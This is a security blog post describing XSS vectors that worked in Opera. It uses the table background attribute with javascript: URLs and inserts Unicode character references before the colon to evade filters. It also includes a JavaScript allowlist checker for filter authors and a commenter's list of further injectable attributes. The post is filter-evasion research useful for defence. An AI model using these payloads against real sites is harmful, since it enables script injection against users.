Opera XSS vectors

It turns out I was right. Originally I thought the protocols reported by my JavaScript fuzzer were false positives but, like lots of my code, it seems to know better than me :) I tested the context of the vectors in a normal HTML link, which didn’t work correctly. But I was messing with some XSS in Hackvertor today with the latest copy of Opera and I found they worked.

Surprisingly, Opera still supports the table background vector, and by combining it with my protocol discoveries you can create some cool additional vectors. The table background vector looks like this:-

<table background=javascript:alert(1)>

Now we can combine it with some of the Unicode characters that work after the javascript string and before the colon:-

<table background=javascript&#14848:alert(1)>

The characters can be repeated many times like this:-

<table background=javascript&#14848&#14848&#14848&#14848&#14848:alert(1)>
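For filter authors, the vectors above show why matching the literal string javascript: in markup is not enough. The following is an added example, not code from the original post: it decodes character references in a URL-valued attribute such as background and accepts only relative references or allowlisted schemes. The function names and the http/https policy are assumptions of this example.

```javascript
// Added example (not from the original post): allowlist check for URL-valued
// attributes such as <table background=...>. Names and policy are assumptions.
const ALLOWED_SCHEMES = new Set(["http", "https"]);
const NAMED_REFS = { colon: ":", Tab: "\t", NewLine: "\n" };

// Decode character references in one pass, with or without a trailing
// semicolon on numeric ones, as in the vectors above.
function decodeRefs(raw) {
  const re = /&(?:#[xX]([0-9a-fA-F]+);?|#([0-9]+);?|(colon|Tab|NewLine);)/g;
  return raw.replace(re, (match, hex, dec, name) => {
    if (name) return NAMED_REFS[name];
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
    return invalid ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

// Weak approach for contrast: look for the literal string in the raw markup.
function naiveBlacklistAllows(raw) {
  return !/javascript:/i.test(raw);
}

// Accept relative references and allowlisted schemes only. Nothing is stripped
// from the scheme: any character outside the RFC 3986 scheme grammar rejects it.
function isSafeUrlAttribute(raw) {
  const value = decodeRefs(raw).replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const colon = value.indexOf(":");
  const delim = value.search(/[\/?#]/);
  if (colon === -1 || (delim !== -1 && delim < colon)) return true; // relative
  const scheme = value.slice(0, colon);
  return /^[A-Za-z][A-Za-z0-9+.-]*$/.test(scheme) &&
    ALLOWED_SCHEMES.has(scheme.toLowerCase());
}

// Attribute values from the post's vectors, plus two constructed benign ones.
const SAMPLES = [
  "javascript:alert(1)",
  "javascript&#14848:alert(1)",
  "javascript&#14848&#14848&#14848&#14848&#14848:alert(1)",
  "https://example.com/bg.png",
  "images/bg.png",
];

function audit(samples) {
  return samples.map((raw) => ({
    raw, naive: naiveBlacklistAllows(raw), allowlist: isSafeUrlAttribute(raw),
  }));
}

console.table(audit(SAMPLES));
```

The allowlist never tries to enumerate which characters a browser ignores, so it rejects these vectors regardless of which code point is inserted before the colon.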

Lots of other characters seem to be affected; I’ve randomly tested a few like 11520 but I haven’t verified them all. Here is a list of the characters:-


One Response to “Opera XSS vectors”

  1. .mario writes:

    Nice research! But don’t forget:

    <bgsound src=
    <body background=
    <iframe src=
    <embed src=
    <img src=
    <image src=

    :)

    Greetings,
    .mario